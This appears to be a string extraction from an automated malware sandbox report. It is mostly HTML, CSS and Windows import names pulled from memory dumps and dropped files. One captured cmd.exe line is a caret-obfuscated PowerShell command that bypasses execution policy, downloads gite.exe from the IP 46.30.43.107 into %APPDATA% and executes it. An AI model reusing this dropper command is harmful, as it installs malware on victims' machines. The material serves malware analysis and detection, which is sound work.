select,.ie7 textarea {vertical-align: middle;}.ie7 button,.ie7 input[type="button"],.ie7 input[type="reset"],.ie7 input[type="submit"] {overflow: visible;}.ie7 input[type="checkbox"],.ie7 input[type="radio"] {height: 13px;width: 13px;}.ie7 .screen-reader-text {clip: rect(1px 1px 1px 1px); /* IE7 */}.ie7 .site-header {position: relative;z-index: 1;}.ie7 .main-navigation {max-width: 930px;padding-right: 150px;}.ie7 .nav-menu li a,.ie7 .nav-menu li {display: block;float: left;}.ie7 .nav-menu ul {top: 40px;}.ie7 .nav-menu .sub-menu,.ie7 .nav-menu .children {display: none;overflow: visible;}.ie7 ul.nav-menu li:hover > ul,.ie7 .nav-menu ul li:hover > ul {display: block;}.ie7 .site-header .search-form [type="search"],.ie7 .site-header .search-form [type="text"] {background-color: #fff;border: 2px solid #c3c0ab;cursor: text;height: 28px;outline: 0;width: 150px;}.ie7 .entry-header,.ie7 .entry-content,.ie7 .entry-summary,.ie7 .entry-meta {width: 604px;}.ie7 .format-status .entry-content,.ie7 .format-status .entry-meta {padding-left: 60px;}.ie7 .sidebar .format-status .entry-content,.ie7 .sidebar .format-status .entry-meta {padding-left: 60px;}.ie7 .sidebar .post-navigation .nav-links,.ie7 .sidebar .paging-navigation .nav-links {width: 604px;}.ie7 .paging-navigation .meta-nav {padding: 0 0 10px;vertical-align: middle;width: 40px;}.ie7 .comments-title,.ie7 .comment-list,.ie7 .comment-reply-title,.ie7 .comment-respond .comment-form {width: 604px;}.ie7 .site-footer .widget-area {max-width: none;left: auto;}/* RTL for Internet Explorer 7 & 8 */.rtl .format-audio .entry-content:before,.rtl .comment-reply-link:before,.rtl .comment-reply-login:before {-ms-filter: "FlipH";filter: FlipH;}

Ansi based on Dropped File (ie179663103.css)

/*US English is the default language pack for DataNavigator2

Ansi based on Dropped File (lang-en.js)

// DO NOT EDIT BELOW THIS LINE

Ansi based on Dropped File (unternehmen.jsp)

/[] "

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

/c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE"

Ansi based on Process Commandline (cmd.exe)

/D /c"

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

/gite.exe

Ansi based on PCAP Processing (PCAP)

/K %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

/MM/yy

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

0 0$0(0,040<0@0H0L0P0

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

00000409

Unicode based on Runtime Data (cmd.exe )

0123456789

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

0_c?9__,_,_,_,,

Ansi based on Image Processing (screen_0.png)

46.30.43.107

Ansi based on PCAP Processing (PCAP)

6.1.7601.17514

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Runtime Data (exE )

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head><base href="https://www.elo.com/wcm/unternehmen.jsp"><script type="text/javascript" src="js/jquery.js"></script><link rel="stylesheet" type="text/css" href="css/design.css">...[if IE]><style type="text/css">@import url(css/design-ie.css);</style><![endif]--> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" /><meta name="format-detection" content="telephone=no" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ELO Digital Office GmbH : Start</title> <meta name="Description" content="Start"><meta name="Generator" content="ELO WCM"><meta http-equiv="content-language" content="de"> <link rel="shortcut icon" href="images/favicon.ico" /> <link rel="stylesheet" type="text/css" href="styles/content.css"> <link rel="stylesheet" type="text/css" href="styles/elobuttons.css"> <link rel="stylesheet" type="text/css" href="styles/backend.css"> ...[if lt IE 7]><script type="text/javascript" src="unitpngfix.js"></script><![endif]--> ...[if lt IE 7]><style type="text/css">@import url(styles/content_ie6.css);</style><![endif]--> ...[if lt IE 8]><style type="text/css">@import url(styles/content_ie7.css);</style><![endif]--> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script> <script type="text/javascript" src="carousel/lib/thickbox/jquery_box.js"></script> <script src="sorttable.js"></script> <script src="elo_validate.js"></script> <script type="text/javascript">$(document).ready(function () { $("#nav").bind('mouseenter', function() { $(".dropdown_contries_div").show(); }); $(".dropdown_contries_div").bind('mouseleave', function() { $(".dropdown_contries_div").hide(); }); }); </script> ...- Do not copy to public page! --> <script type="text/javascript"> $(document).ready(function () { $('.secondary ul li a.elomenusel').wrapInner('<div class="menuSelContent">').wrapInner('<div class="menuSel2nd">').wrapInner('<div class="menuSel1st">'); $('.secondary ul li a.elomenusel').append('<div class="menuSelB2nd">'); $('.menuSelB2nd').append('<div class="menuSelB1st">'); $('.eloheaderup img').replaceWith('<img src="images/button-left.png" alt="up" border="0">'); $('.eloheaderdown img').replaceWith('<img src="images/button-right.png" alt="up" border="0">'); $('.eloheaderedit img').replaceWith('<img src="images/button-edit.png" alt="up" border="0">'); $('.eloheaderdownalone img').replaceWith('<img src="images/button-right.png" alt="up" border="0">'); $('.eloheaderupalone img').replaceWith('<img src="images/button-left.png" alt="up" border="0">'); $('.elomenuup img').replaceWith('<img src="images/button-up.png" alt="up" border="0">'); $('.elomenudown img').replaceWith('<img src="images/button-down.png" alt="up" border="0">'); $('.elomenuupalone img').replaceWith('<img src="images/button-up.png" alt="up" border="0">'); $('.elomenudownalone img').replaceWith('<img src="images/button-down.png" alt="up" border="0">'); $('.elomenuedit img').replaceWith('<img src="images/button-edit.png" alt="up" border="0">'); $('.eloheaderup').wrap('<div class="adminButtonTop">'); $('.eloheaderdown').wrap('<div class="adminButtonTop">'); $('.eloheaderdownalone').wrap('<div class="adminButtonTop">'); $('.eloheaderupalone').wrap('<div class="adminButtonTop">'); $('.eloheaderedit').wrap('<div class="adminButtonTop">'); $('.eloheader ul li').mouseenter(function () { $(this).find('.adminButtonTop').show(); $(this).mouseleave(function () { $('.adminButtonTop').hide(); }); }); $('.content_inner').mouseenter(function () { $('.adminButtonTop').hide(); }); $('.secondary .elomenu ul li').mouseenter(function () { $(this).find(' > a').show(); $(this).mouseleave(function () { $(this).find('.elomenudown').hide(); $(this).find('.elomenudownalone').hide(); $(this).find('.elomenuup').hide(); $(this).find('.elomenuupalone').hide(); $(this).find('.elomenuedit').hide(); }); }); }); </script>... Start Visual Website Optimizer Asynchronous Code --><script type='text/javascript'>var _vwo_code=(function(){var account_id=7054,settings_tolerance=2000,library_tolerance=2500,use_existing_jquery=false,// DO NOT EDIT BELOW THIS LINEf=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init();</script>... End Visual Website Optimizer Asynchronous Code --> </head> <body> <div id="header"> <div id="header_inner"> <a href="[[URL]/Start]"><img src="images/elo_logo_blind.gif" class="elo_logo" width="75" height="50" alt="ELO Logo" /></a> <div id="mainmenutop"><div class="eloheader"><ul><li class="eloheadersel"><a class="eloheadersel" href="/wcm/de/start"><span>Start</span></a></li><li><a href="/wcm/de/produkte"><span>Produkte</span></a></li><li><a href="/wcm/de/loesungen"><span>Lsungen</span></a></li><li><a href="/wcm/de/service"><span>Service</span></a></li><li><a href="/wcm/de/partner"><span>Partner</span></a></li><li><a href="/wcm/de/events"><span>Events</span></a></li><li><a href="/wcm/de/unternehmen"><span>Unternehmen</span></a></li><li><a href="/wcm/de/mediathek"><span>Mediathek</span></a></li></ul></div></div> <div id="language_container"><a class="gg_bg flag_de" href="/wcm/de/unternehmen/global-gateway"><span><img src="images/flags/de.gif" />Deutschland   |  <b>Worldwide</b></span></a> </div> </div> ... header_inner closed--> </div> ... header closed--> <div id="content"> <div id="breadcrumb" style="margin: 0px auto; padding-top: 8px; width: 960px; font-size: 8pt;"> <p>Sie befinden sich hier: <span class="elopath"><a href="/wcm/de/start">Start</a></span></p> </div> <div id="content_inner"> <div class="primary"> <div class="container"> ... breadcrumb was here --> <div class="elocontent"><a name="d1092"></a><h1>Vielen Dank</h1><p>Wir haben Ihre Anfrage erhalten und werden diese umgehend bearbeiten.</p><p><a href="http://www.elo.com">Hier </a>gelangen Sie <a href="http://www.elo.com">zurck zur Startseite</a>.</p></div> </div> ... primary closed --> </div>... container_600 closed --> <div class="secondary"> <ul class="extern"> <li><a href="http://partner.elo.com/referenzfinder.html">Kundenreferenzen</a></li> </ul> <div class="elomenu"></div> </div> ... secondary closed --> </div> ... content_inner closed --> </div> ... content closed --> <div id="footer"> <div id="footer_inner"> <div id="footer_first"> <ul> <li><b>ELO-Erweiterungen:</b></li> <li> <a href="/wcm/de/produkte/erweiterungen/module/elo-backup">ELO Backup</a></li><li> <a href="/wcm/de/produkte/erweiterungen/module/elo-barcode">ELO Barcode</a></li><li> <a href="/wcm/de/produkte/erweiterungen/module/elo-for-mobile-devices">ELO for Mobile Devices</a></li><li> <a href="/wcm/de/produkte/erweiterungen/schnittstellen/elo-for-sap">ELO for SAP</a></li><li> <a href="/wcm/de/produkte/erweiterungen/schnittstellen/elo-for-sharepoint">ELO for Sharepoint</a></li><li> <a href="/wcm/de/produkte/erweiterungen/module/elo-replikation">ELO Replikation</a></li> </ul> </div> <div id="footer_second"> <ul> <li><b>ELO Partnernetzwerk: </b></li> <li> <a title="ELO Business-Partner" href="https://partner.elo.com/elo-business-partner-finden.html">ELO Business-Partner</a></li> <li> <a target="_blank" title="ELO Fachhndler" href="http://elooffice.elo.com/kaufen/fachhaendler.html">ELO<span class="times">office</span> Fachhndler</a></li> <li> <a target="_blank" title="ELO Business-Partner" href="http://elooffice.elo.com/kaufen/distributoren.html">ELO<span class="times">office</span> Distributor</a></li> <li> <a title="ELO-Kooperationspartner" href="http://partner.elo.com/kooperationspartner.html">ELO-Kooperationspartner</a></li> <li> <a title="ELO Strategie-Partner" href="/wcm/de/partner/partner-werden">Partner werden</a></li> </ul> </div> <div id="footer_third"> <ul> <li><b>Ntzliche Links:</b></li> <li> <a target="_blank" target="_blank" title="ELOoffice Blog" href="http://blog.elooffice.de">ELO<span class="times">office</span> Blog</a></li> <li> <a title="ELOoffice Downloads" target="_blank" href="http://elooffice.elo.com/service/downloadcenter.html">ELO<span class="times">office</span> Downloads</a></li> <li> <a href="/wcm/de/service/support">ELO Support</a></li> <li> <a target="_blank" href="https://elooffice.elo.com/service/schulungen.html">ELOoffice Schulungen</a></li> <li> <a target="_blank" title="ELOoffice Testversion" href="http://elooffice.elo.com/testversion.html">ELO<span class="times">office</span> Testversion</a></li><li> <a href="/wcm/de/unternehmen/wir-ueber-uns/jobs">Jobs</a></li> </ul> </div> <div id="footer_fourth"> <ul> <li><b>ber ELO:</b></li> <li> <a href="/wcm/de/unternehmen">Wer ist ELO</a></li><li> <a href="/wcm/de/unternehmen/wir-ueber-uns/philosophie">ELO Philosophie</a><br /></li><li> <a href="/wcm/de/unternehmen/auszeichnungen-und-studien">Auszeichnungen</a></li><li> <a href="http://partner.elo.com/referenzfinder.html">Kundenreferenzen</a></li><li> <a href="/wcm/de/unternehmen/wir-ueber-uns/standorte">Standorte</a></li><li> <a href="/wcm/de/unternehmen">Kontakt</a><br /></li> </ul> </div> <div id="copyright"> <img src="images/colorcode.gif" width="370" height="2" alt="colorcode"/><br/> <a href="/wcm/de/impressum/datenschutz">Datenschutz</a> ·</a><a href="/wcm/de/impressum/impressum">Impressum</a> ·</a><a href="http://elo.com/wcm/de/unternehmen/kontakt">Kontakt</a> ·</a><a href="/wcm/de/unternehmen/wir-ueber-uns">ELO Digital Office GmbH</a><br>2016 Alle Rechte vorbehalten.</div> </div> </div>... Copyright (c) 2000-2016 etracker GmbH. All rights reserved. -->... This material may not be reproduced, displayed, modified or distributed -->... without the express prior written permission of the copyright holder. -->... etracker tracklet 4.0 --><script type="text/javascript">var et_easy = 1;var et_pagename = 'index.jsp';</script><script id="_etLoader" type="text/javascript" charset="UTF-8" data-secure-code="9J3MuV" src="//static.etracker.com/code/e.js"></script>... etracker tracklet 4.0 --> </body></html>

Ansi based on Dropped File (unternehmen.jsp)

</body>

Ansi based on Dropped File (unternehmen.jsp)

</div>

Ansi based on Dropped File (unternehmen.jsp)

</div> ... content closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... content_inner closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... header closed-->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... header_inner closed-->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... primary closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... secondary closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div>... container_600 closed -->

Ansi based on Dropped File (unternehmen.jsp)

</head>

Ansi based on Dropped File (unternehmen.jsp)

</html>

Ansi based on Dropped File (unternehmen.jsp)

</script>

Ansi based on Dropped File (unternehmen.jsp)

</span>

Ansi based on Dropped File (unternehmen.jsp)

</title>

Ansi based on Dropped File (unternehmen.jsp)

</ul>

Ansi based on Dropped File (unternehmen.jsp)

<>+-*/%()|^&=,

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>... Copyright (c) Microsoft Corporation --><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="5.1.0.0" processorArchitecture="x86" name="Microsoft.Windows.FileSystem.CMD" type="win32"/><description>Windows Command Processor</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"> <windowsSettings> <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware> </windowsSettings></application></assembly>(

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></ap

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

<a class="gg_bg flag_de" href="/wcm/de/unternehmen/global-gateway"><span><img src="images/flags/de.gif" />Deutschland   |  <b>Worldwide</b></span></a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/impressum/datenschutz">Datenschutz</a> ·</a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/impressum/impressum">Impressum</a> ·</a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/start">Start</a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/unternehmen/wir-ueber-uns">ELO Digital Office GmbH</a>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<a href="http://elo.com/wcm/de/unternehmen/kontakt">Kontakt</a> ·</a>

Ansi based on Dropped File (unternehmen.jsp)

<a name="d1092"></a><h1>Vielen Dank</h1>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<body>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<head>

Ansi based on Dropped File (unternehmen.jsp)

<html>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li class="eloheadersel"><a class="eloheadersel" href="/wcm/de/start"><span>Start</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-backup">ELO Backup</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-barcode">ELO Barcode</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-for-mobile-devices">ELO for Mobile Devices</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-replikation">ELO Replikation</a></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/schnittstellen/elo-for-sharepoint">ELO for Sharepoint</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/service/support">ELO Support</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen">Kontakt</a><br /></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen/auszeichnungen-und-studien">Auszeichnungen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen/wir-ueber-uns/philosophie">ELO Philosophie</a><br /></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen/wir-ueber-uns/standorte">Standorte</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="http://partner.elo.com/referenzfinder.html">Kundenreferenzen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" href="https://elooffice.elo.com/service/schulungen.html">ELOoffice Schulungen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" target="_blank" title="ELOoffice Blog" href="http://blog.elooffice.de">ELO<span class="times">office</span> Blog</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" title="ELO Business-Partner" href="http://elooffice.elo.com/kaufen/distributoren.html">ELO<span class="times">office</span> Distributor</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" title="ELO Fachhndler" href="http://elooffice.elo.com/kaufen/fachhaendler.html">ELO<span class="times">office</span> Fachhndler</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" title="ELOoffice Testversion" href="http://elooffice.elo.com/testversion.html">ELO<span class="times">office</span> Testversion</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELO Business-Partner" href="https://partner.elo.com/elo-business-partner-finden.html">ELO Business-Partner</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELO Strategie-Partner" href="/wcm/de/partner/partner-werden">Partner werden</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELO-Kooperationspartner" href="http://partner.elo.com/kooperationspartner.html">ELO-Kooperationspartner</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELOoffice Downloads" target="_blank" href="http://elooffice.elo.com/service/downloadcenter.html">ELO<span class="times">office</span> Downloads</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/events"><span>Events</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/loesungen"><span>Lsungen</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/mediathek"><span>Mediathek</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/partner"><span>Partner</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/produkte"><span>Produkte</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/service"><span>Service</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/unternehmen"><span>Unternehmen</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="http://partner.elo.com/referenzfinder.html">Kundenreferenzen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li><b>ELO Partnernetzwerk: </b></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><b>ELO-Erweiterungen:</b></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><b>Ntzliche Links:</b></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

<p><a href="http://www.elo.com">Hier </a>gelangen Sie <a href="http://www.elo.com">zurck zur Startseite</a>.</p></div>

Ansi based on Dropped File (unternehmen.jsp)

<p>Sie befinden sich hier:

Ansi based on Dropped File (unternehmen.jsp)

<p>Wir haben Ihre Anfrage erhalten und werden diese umgehend bearbeiten.</p>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<title>ELO Digital Office GmbH : Start

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

=,;+/[] "

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

=ExitCode

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

=ExitCodeAscii

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

=v<j=v

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

?!?7?J?

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

????????.???

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

?^__,____,

Ansi based on Image Processing (screen_0.png)

?terminate@@YAXXZ

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

@.data

Ansi based on Dropped File (Roaming.exE.1622950302)

@media (max-width: 767px)

Ansi based on Dropped File (ext.default.css)

@media (min-width: 768px)

Ansi based on Dropped File (ext.default.css)

[...]

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

[Rename]

Ansi based on Dropped File (Roaming.exE.1622950302)

\CMD.EXE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\Microsoft\Internet Explorer\Quick Launch

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

\Policies\Microsoft\Windows\System

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\RPC Control\console-0x00000EE8-lpc-handle

Unicode based on Runtime Data (cmd.exe )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (cmd.exe )

\Shell\Open\Command

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\Temp

Unicode based on Dropped File (Roaming.exE.1622950302)

\ThemeApiPort

Unicode based on Runtime Data (exE )

\XCOPY.EXE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__0?_____q__0_____?_______

Ansi based on Image Processing (screen_0.png)

__getmainargs

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__p__commode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__p__fmode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__set_app_type

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__setusermatherr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_a__a_

Ansi based on Image Processing (screen_0.png)

_amsg_exit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_cexit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_close

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_controlfp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_dup2

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_errno

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_except_handler4_common

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_exit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_get_osfhandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_getch

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_initterm

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_local_unwind4

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_open_osfhandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_pclose

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_pipe

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_setjmp3

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_setmode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

